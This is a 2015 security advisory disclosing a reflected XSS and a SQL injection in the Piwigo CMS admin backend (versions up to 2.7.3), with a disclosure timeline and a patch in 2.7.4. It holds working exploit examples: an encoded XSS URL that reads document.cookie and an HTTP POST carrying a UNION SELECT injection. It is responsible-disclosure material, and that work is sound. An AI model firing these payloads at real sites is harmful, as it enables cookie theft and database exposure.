CMS Piwigo 2.7.3 Cross Site Scripting / SQL Injection

`Advisory: Reflecting XSS- and SQL Injection vulnerability in CMS Piwigo <=  
v. 2.7.3  
Advisory ID: SROEADV-2015-06  
Author: Steffen Rösemann  
Affected Software: CMS Piwigo <= v. 2.7.3 (Release date: 9th January 2015)  
Vendor URL: http://piwigo.org  
Vendor Status: patched  
CVE-ID: -  
  
==========================  
Vulnerability Description:  
==========================  
  
Piwigo <= v. 2.7.3 suffers from a reflecting XSS and a SQL injection in its  
administrative backend.  
  
==================  
Technical Details:  
==================  
  
The reflecting XSS vulnerability resides in the "page" parameter used in  
the file admin.php which can be found in the administrative backend located  
here in a common Piwigo installation:  
  
http://{TARGET}/admin.php?page=plugin-AdminTools  
  
Exploit-Example:  
  
http://  
{TARGET}/admin.php?page=plugin-AdminTools%3Cimg%20src=n%20onerror=eval%28String.fromCharCode%2897,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59%29%29%20%3E  
  
The SQL injection vulnerability can as well be found in the administrative  
backend and can be found in the "History" functionality located here:  
  
http://{TARGET}/admin.php?page=history  
  
The SQL injection vulnerability can be exploited by appending arbitrary SQL  
statements in a POST request to the parameter "user":  
  
Exploit-Example:  
  
POST /piwigo/admin.php?page=history HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101  
Firefox/31.0 Iceweasel/31.3.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/piwigo/admin.php?page=history&search_id=82  
Cookie: pwg_display_thumbnail=no_display_thumbnail;  
pwg_id=19rpao6bhdsn3l0u0o1im4m680;  
_pk_id.1.1fff=7588ea02f4577539.1420720532.1.1420720532.1420720532.  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 255  
  
start=2015-01-08+&end=2015-01-09+&types%5B%5D=none&types%5B%5D=picture&types%5B%5D=high&types%5B%5D=other&user=2)  
AND 1=2 UNION SELECT user(),database(),3,version(),5,6,7,8,9 --  
&image_id=&filename=&ip=&display_thumbnail=no_display_thumbnail&submit=Submit  
  
=========  
Solution:  
=========  
  
Install the latest version 2.7.4 (released 17th February 2015).  
  
  
====================  
Disclosure Timeline:  
====================  
08-Jan-2015 – found the vulnerability  
09-Jan-2015 - informed the developers  
09-Jan-2015 – release date of this security advisory [without technical  
details]  
09-Jan-2015 - vendor responded, will work on a patch (released in v. 2.7.4)  
17-Feb-2015 - vendor releases patch 2.7.4 (see [3])  
17-Feb-2015 - release date of this security advisory  
17-Feb-2015 - send to FullDisclosure  
  
========  
Credits:  
========  
  
Vulnerability found and advisory written by Steffen Rösemann.  
  
===========  
References:  
===========  
  
[1] http://piwigo.org  
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-06.html  
[3] http://piwigo.org/forum/viewtopic.php?id=25179  
  
  
`